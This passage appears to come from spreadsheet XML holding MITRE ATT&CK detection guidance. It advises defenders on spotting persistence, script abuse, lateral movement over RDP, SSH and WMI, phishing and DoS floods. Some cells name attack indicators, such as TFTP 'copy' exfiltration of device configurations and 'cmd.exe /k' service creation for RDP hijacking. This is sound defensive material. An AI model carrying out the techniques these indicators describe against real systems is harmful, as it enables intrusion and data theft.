Monitor command-line execution of the &lt;code&gt;launchctl&lt;/code&gt; command immediately followed by abnormal network connections. [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s with executable paths pointing to &lt;code&gt;/tmp&lt;/code&gt; and &lt;code&gt;/Shared&lt;/code&gt; folders locations are potentially suspicious. 
When removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure the services are unloaded prior to deleting plist files.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)
Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. </t>
  </si>
  <si>
    <t>Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Monitor for execution of JXA through &lt;code&gt;osascript&lt;/code&gt; and usage of &lt;code&gt;OSAScript&lt;/code&gt; API that may be related to other suspicious behavior occurring on the system.
Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.</t>
  </si>
  <si>
    <t>Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.(Citation: Cisco IOS Software Integrity Assurance - Command History)
Consider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.</t>
  </si>
  <si>
    <t>If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.
Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)
It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.
Consider monitoring for Windows event ID (EID) 400, which shows the version of PowerShell executing in the &lt;code&gt;EngineVersion&lt;/code&gt; field (which may also be relevant to detecting a potential [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)) as well as if PowerShell is running locally or remotely in the &lt;code&gt;HostName&lt;/code&gt; field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.(Citation: inv_ps_attacks)</t>
  </si>
  <si>
    <t>Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives.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t>
  </si>
  <si>
    <t xml:space="preserve">Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt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 </t>
  </si>
  <si>
    <t>Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Understanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent.</t>
  </si>
  <si>
    <t>Monitor for execution of AppleScript through &lt;code&gt;osascript&lt;/code&gt; and usage of the &lt;code&gt;NSAppleScript&lt;/code&gt; and &lt;code&gt;OSAScript&lt;/code&gt; APIs that may be related to other suspicious behavior occurring on the system.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[Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
Understanding standard usage patterns is important to avoid a high number of false positives.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t>
  </si>
  <si>
    <t>Changes to service Registry entries and command line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool [PsExec](https://attack.mitre.org/software/S0029).</t>
  </si>
  <si>
    <t>Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc.  
Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. </t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to code repositories. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.</t>
  </si>
  <si>
    <t xml:space="preserve">Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) </t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to known cloud storage services. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor network traffic for uncommon data flows (e.g. unusual network communications, suspicious communications that have never been seen before, communications sending fixed size data packets at regular intervals).  Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. </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</si>
  <si>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 
For network infrastructure devices, collect AAA logging to monitor for `copy` commands being run to exfiltrate configuration files to non-standard destinations over unencrypted protocols such as TFTP.</t>
  </si>
  <si>
    <t xml:space="preserve">Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) 
Artifacts and evidence of symmetric key exchange may be recoverable by analyzing network traffic or looking for hard-coded values within malware. If recovered, these keys can be used to decrypt network data from command and control channels. </t>
  </si>
  <si>
    <t>Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.</t>
  </si>
  <si>
    <t>Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values.</t>
  </si>
  <si>
    <t>Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.</t>
  </si>
  <si>
    <t xml:space="preserve">Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data. </t>
  </si>
  <si>
    <t>Detection of a network flood can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</t>
  </si>
  <si>
    <t>Detection of reflection amplification can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a reflection amplification DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</t>
  </si>
  <si>
    <t>Monitor external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.</t>
  </si>
  <si>
    <t>Monitor internal and websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.
For network infrastructure devices, collect AAA logging to monitor for `erase` commands that delete critical configuration files.</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.
For network infrastructure devices, collect AAA logging to monitor for `format` commands being run to erase the file structure and prevent recovery of the device.</t>
  </si>
  <si>
    <t>Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.</t>
  </si>
  <si>
    <t>Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.</t>
  </si>
  <si>
    <t xml:space="preserve">Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. </t>
  </si>
  <si>
    <t>Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes.</t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.
Monitor for suspicious descendant process spawning from Microsoft Office and other productivity software.(Citation: Elastic - Koadiac Detection with EQL)</t>
  </si>
  <si>
    <t>URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites as well as links redirecting to adversary infrastructure based by upon suspicious OAuth patterns with unusual TLDs.(Citation: Microsoft OAuth 2.0 Consent Phishing 2021). Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
Because this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.</t>
  </si>
  <si>
    <t>Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. 
Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.</t>
  </si>
  <si>
    <t>Use of SSH may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.
On macOS systems &lt;code&gt;log show --predicate 'process = "sshd"'&lt;/code&gt; can be used to review incoming SSH connection attempts for suspicious activity. The command &lt;code&gt;log show --info --predicate 'process = "ssh" or eventMessage contains "ssh"'&lt;/code&gt; can be used to review outgoing SSH connection activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)
On Linux systems SSH activity can be found in the logs located in &lt;code&gt;/var/log/auth.log&lt;/code&gt; or &lt;code&gt;/var/log/secure&lt;/code&gt; depending on the distro you are using.</t>
  </si>
  <si>
    <t>Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.
Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.</t>
  </si>
  <si>
    <t>Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017) Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.
Monitor for any influxes or abnormal increases in DCOM related Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic (typically over port 135).</t>
  </si>
  <si>
    <t>Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior.  Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.(Citation: Medium Detecting Lateral Movement) Also monitor for remote WMI connection attempts (typically over port 5985 when using HTTP and 5986 for HTTPS).</t>
  </si>
  <si>
    <t>Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.</t>
  </si>
  <si>
    <t>Use of SSH may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.</t>
  </si>
  <si>
    <t>Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne)(Citation: Windows Event Forwarding Payne) Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as [Net](https://attack.mitre.org/software/S0039), on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.(Citation: Medium Detecting WMI Persistence)</t>
  </si>
  <si>
    <t>Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
On macOS systems &lt;code&gt;log show --predicate 'process = "screensharingd" and eventMessage contains "Authentication:"'&lt;/code&gt; can be used to review incoming VNC connection attempts for suspicious activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)
Monitor for use of built-in debugging environment variables (such as those containing credentials or other sensitive information) as well as test/default users on VNC servers, as these can leave openings for adversaries to abuse.(Citation: Gnome Remote Desktop grd-settings)(Citation: Gnome Remote Desktop gschema)</t>
  </si>
  <si>
    <t>Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.</t>
  </si>
  <si>
    <t>Locations where &lt;code&gt;profile.ps1&lt;/code&gt; can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet)(Citation: Microsoft Profiles) Example profile locations (user defaults as well as program-specific) include:
* &lt;code&gt;$PsHome\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$PsHome\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\\\[My ]Documents\PowerShell\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\\\[My ]Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;
Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. Remote access tools with built-in features may also interact directly with the Windows API to perform these functions outside of typical system utilities. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts.  
Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns)  
Creation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software.
Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt; registry key for any new or suspicious entries that do not correlate with known system files or benign software.(Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.</t>
  </si>
  <si>
    <t>Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.
Enable the UpdateFolderPermissions action for all logon types. The mailbox audit log will forward folder permission modification events to the Unified Audit Log. Create rules to alert on ModifyFolderPermissions operations where the Anonymous or Default user is assigned permissions other than None. 
A larger than normal volume of emails sent from an account and similar phishing emails sent from  real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.</t>
  </si>
  <si>
    <t>Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process.
User file association preferences are stored under &lt;code&gt; [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts&lt;/code&gt; and override associations configured under &lt;code&gt;[HKEY_CLASSES_ROOT]&lt;/code&gt;. Changes to a user's preference will occur under this entry's subkeys.
Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.</t>
  </si>
  <si>
    <t xml:space="preserve">Collect activity logs from IAM services and cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. </t>
  </si>
  <si>
    <t>Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.</t>
  </si>
  <si>
    <t xml:space="preserve">There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary paths with unknown paths or otherwise malicious content. Even though some third-party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\Software\Classes\CLSID\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\.(Citation: Elastic COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated.  
Likewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed. </t>
  </si>
  <si>
    <t>Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence.(Citation: TechNet Autoruns)(Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI &lt;code&gt;EventFilter&lt;/code&gt;, &lt;code&gt;EventConsumer&lt;/code&gt;, and &lt;code&gt;FilterToConsumerBinding&lt;/code&gt; events. Event ID 5861 is logged on Windows 10 systems when new &lt;code&gt;EventFilterToConsumerBinding&lt;/code&gt; events are created.(Citation: Elastic - Hunting for Persistence Part 1)
Monitor processes and command-line arguments that can be used to register WMI persistence, such as the &lt;code&gt; Register-WmiEvent&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).(Citation: Microsoft Register-WmiEvent)</t>
  </si>
  <si>
    <t xml:space="preserve">While users may customize their shell profile files, there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.
Monitor for changes to &lt;code&gt;/etc/profile&lt;/code&gt; and &lt;code&gt;/etc/profile.d&lt;/code&gt;, these files should only be modified by system administrators. MacOS users can leverage Endpoint Security Framework file events monitoring these specific files.(Citation: ESF_filemonitor) 
For most Linux and macOS systems, a list of file paths for valid shell options available on a system are located in the &lt;code&gt;/etc/shells&lt;/code&gt; file.
</t>
  </si>
  <si>
    <t>Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.
Monitor for LNK files created with a Zone Identifier value greater than 1, which may indicate that the LNK file originated from outside of the network.(Citation: BSidesSLC 2020 - LNK Elastic)</t>
  </si>
  <si>
    <t>Use file integrity monitoring to detect changes made to the &lt;code&gt;authorized_keys&lt;/code&gt; file for each user on a system. Monitor for suspicious processes modifying the &lt;code&gt;authorized_keys&lt;/code&gt; file. In cloud environments, monitor instances for modification of metadata and configurations.
Monitor for changes to and suspicious processes modifiying &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt;.
For network infrastructure devices, collect AAA logging to monitor for rogue SSH keys being added to accounts.</t>
  </si>
  <si>
    <t>Monitor for changes to Registry values associated with Windows logon scrips, nameley &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;.
Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.</t>
  </si>
  <si>
    <t>Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns)  New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.
Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s  KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.
Ensure Launch Agent's &lt;code&gt; ProgramArguments &lt;/code&gt; key pointing to executables located in the &lt;code&gt;/tmp&lt;/code&gt; or &lt;code&gt;/shared&lt;/code&gt; folders are in alignment with enterprise policy. Ensure all Launch Agents with the &lt;code&gt;RunAtLoad&lt;/code&gt; key set to &lt;code&gt;true&lt;/code&gt; are in alignment with policy. </t>
  </si>
  <si>
    <t>The &lt;code&gt;/Library/StartupItems&lt;/code&gt; folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.
Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.</t>
  </si>
  <si>
    <t>Monitor emond rules creation by checking for files created or modified in &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; and &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Malicious XDG autostart entries may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/xdg/autostart&lt;/code&gt; and &lt;code&gt;~/.config/autostart&lt;/code&gt; directories. Depending on individual configurations, defenders may need to query the environment variables &lt;code&gt;$XDG_CONFIG_HOME&lt;/code&gt; or &lt;code&gt;$XDG_CONFIG_DIRS&lt;/code&gt; to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.
Suspicious processes or scripts spawned in this manner will have a parent process of the desktop component implementing the XDG specification and will execute as the logged on user.</t>
  </si>
  <si>
    <t>Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt; as well as execution of the W32tm.exe utility.(Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk.(Citation: Github W32Time Oct 2017)
The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers.(Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.
Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.</t>
  </si>
  <si>
    <t>Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as &lt;code&gt;DEBUG_PROCESS&lt;/code&gt; and &lt;code&gt;DEBUG_ONLY_THIS_PROCESS&lt;/code&gt;. (Citation: Microsoft Dev Blog IFEO Mar 2010)
Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt;. (Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t>Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017) 
Tools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)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t>
  </si>
  <si>
